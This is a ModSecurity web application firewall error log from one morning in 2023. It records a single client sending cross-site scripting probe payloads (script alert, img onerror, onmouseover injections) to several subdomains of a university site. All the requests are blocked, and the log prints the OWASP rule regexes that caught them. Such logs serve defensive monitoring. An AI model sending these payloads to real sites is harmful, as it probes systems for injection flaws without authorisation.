[Tue Aug 29 11:52:30.575236 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ct_community. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:ct_community: <script>alert(document.domain);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO15jsCo-f0AAAlUlsMAAAA0"]
[Tue Aug 29 11:52:30.590082 2023] [:error] [pid 2564] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ct_community. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:ct_community: <script>alert(document.domain);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO15jsCo-f0AAAoEZPYAAAAB"]
[Tue Aug 29 11:52:30.664389 2023] [:error] [pid 2564] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ct_community. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:ct_community: <script>alert(document.domain);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO15jsCo-f0AAAoEZPgAAAAB"]
[Tue Aug 29 11:52:30.666300 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ct_community. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:ct_community: <script>alert(document.domain);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO15jsCo-f0AAAlUlsUAAAA0"]
[Tue Aug 29 11:52:32.616226 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:title: '></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/thruk/cgi-bin/login.cgi"] [unique_id "ZO15kMCo-f0AAAoPuU4AAAAM"]
[Tue Aug 29 11:52:32.620436 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:title: '></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/thruk/cgi-bin/login.cgi"] [unique_id "ZO15kMCo-f0AAAnd3HsAAAAI"]
[Tue Aug 29 11:52:32.636332 2023] [:error] [pid 2573] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:title: '></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/thruk/cgi-bin/login.cgi"] [unique_id "ZO15kMCo-f0AAAoN9d0AAAAJ"]
[Tue Aug 29 11:52:32.637736 2023] [:error] [pid 2579] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:title: '></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/thruk/cgi-bin/login.cgi"] [unique_id "ZO15kMCo-f0AAAoT7LkAAAAD"]
[Tue Aug 29 11:52:33.563996 2023] [:error] [pid 2531] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:title: '></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/thruk/cgi-bin/login.cgi"] [unique_id "ZO15kcCo-f0AAAnjjP4AAAAX"]
[Tue Aug 29 11:52:33.569184 2023] [:error] [pid 2574] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:type: xss\\x22 onmouseover=alert(document.domain) \\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/main/calendar/agenda_list.php"] [unique_id "ZO15kcCo-f0AAAoO5zsAAAAK"]
[Tue Aug 29 11:52:33.572008 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:html_element_selection. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )>\\x0d\\x0a found within ARGS:html_element_selection: </script><img src onerror=alert(document.domain)>\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO15kcCo-f0AAAnTlQwAAAAA"]
[Tue Aug 29 11:52:33.577714 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:type: xss\\x22 onmouseover=alert(document.domain) \\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/main/calendar/agenda_list.php"] [unique_id "ZO15kcCo-f0AAAn402AAAAAW"]
[Tue Aug 29 11:52:33.648253 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:type: xss\\x22 onmouseover=alert(document.domain) \\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/main/calendar/agenda_list.php"] [unique_id "ZO15kcCo-f0AAAjdQdYAAAAZ"]
[Tue Aug 29 11:52:33.648662 2023] [:error] [pid 2531] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:type: xss\\x22 onmouseover=alert(document.domain) \\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/main/calendar/agenda_list.php"] [unique_id "ZO15kcCo-f0AAAnjjP8AAAAX"]
[Tue Aug 29 11:52:33.711079 2023] [:error] [pid 2531] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:type: xss\\x22 onmouseover=alert(document.domain) \\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/main/calendar/agenda_list.php"] [unique_id "ZO15kcCo-f0AAAnjjQAAAAAX"]
[Tue Aug 29 11:52:33.728634 2023] [:error] [pid 2579] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:html_element_selection. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )>\\x0d\\x0a found within ARGS:html_element_selection: </script><img src onerror=alert(document.domain)>\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO15kcCo-f0AAAoT7LwAAAAD"]
[Tue Aug 29 11:52:33.731788 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:html_element_selection. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )>\\x0d\\x0a found within ARGS:html_element_selection: </script><img src onerror=alert(document.domain)>\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO15kcCo-f0AAAoPuVMAAAAM"]
[Tue Aug 29 11:52:33.734355 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:html_element_selection. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )>\\x0d\\x0a found within ARGS:html_element_selection: </script><img src onerror=alert(document.domain)>\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO15kcCo-f0AAAoLfG0AAAAG"]
[Tue Aug 29 11:52:33.734847 2023] [:error] [pid 2531] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:html_element_selection. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )>\\x0d\\x0a found within ARGS:html_element_selection: </script><img src onerror=alert(document.domain)>\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO15kcCo-f0AAAnjjQEAAAAX"]
[Tue Aug 29 11:52:33.755173 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:title: '></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/thruk/cgi-bin/login.cgi"] [unique_id "ZO15kcCo-f0AAAoPuVQAAAAM"]
[Tue Aug 29 11:52:34.636955 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:email_create. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: \\x22 onmouseover= found within ARGS:email_create: 2Ue0GylxOzjssB9Fxo2BoPQRLhR@bIUx0.com\\x22 onmouseover=alert(document.domain) y="] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO15ksCo-f0AAAfWOO4AAAAL"]
[Tue Aug 29 11:52:34.638200 2023] [:error] [pid 2574] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:email_create. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: \\x22 onmouseover= found within ARGS:email_create: 2Ue0GylxOzjssB9Fxo2BoPQRLhR@bIUx0.com\\x22 onmouseover=alert(document.domain) y="] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO15ksCo-f0AAAoO5z8AAAAK"]
[Tue Aug 29 11:52:34.638754 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:email_create. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:email_create: 2Ue0GylxOzjssB9Fxo2BoPQRLhR@bIUx0.com\\x22 onmouseover=alert(document.domain) y="] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO15ksCo-f0AAAlUltIAAAA0"]
[Tue Aug 29 11:52:34.640112 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:email_create. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: \\x22 onmouseover= found within ARGS:email_create: 2Ue0GylxOzjssB9Fxo2BoPQRLhR@bIUx0.com\\x22 onmouseover=alert(document.domain) y="] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO15ksCo-f0AAAoGFYsAAAAE"]
[Tue Aug 29 11:52:34.659014 2023] [:error] [pid 2576] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:email_create. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:email_create: 2Ue0GylxOzjssB9Fxo2BoPQRLhR@bIUx0.com\\x22 onmouseover=alert(document.domain) y="] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO15ksCo-f0AAAoQ3JQAAAAN"]
[Tue Aug 29 11:52:34.660247 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:tab. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:tab: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO15ksCo-f0AAAfWOO8AAAAL"]
[Tue Aug 29 11:52:34.662065 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:tab. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:tab: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO15ksCo-f0AAAoGFYwAAAAE"]
[Tue Aug 29 11:52:34.673461 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:tab. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:tab: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO15ksCo-f0AAAoPuVgAAAAM"]
[Tue Aug 29 11:52:34.680431 2023] [:error] [pid 2531] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:tab. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:tab: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO15ksCo-f0AAAnjjQYAAAAX"]
[Tue Aug 29 11:52:34.682428 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:html_element_selection. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )>\\x0d\\x0a found within ARGS:html_element_selection: </script><img src onerror=alert(document.domain)>\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO15ksCo-f0AAAlUltQAAAA0"]
[Tue Aug 29 11:52:34.695480 2023] [:error] [pid 2573] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:tab. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:tab: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO15ksCo-f0AAAoN9eUAAAAJ"]
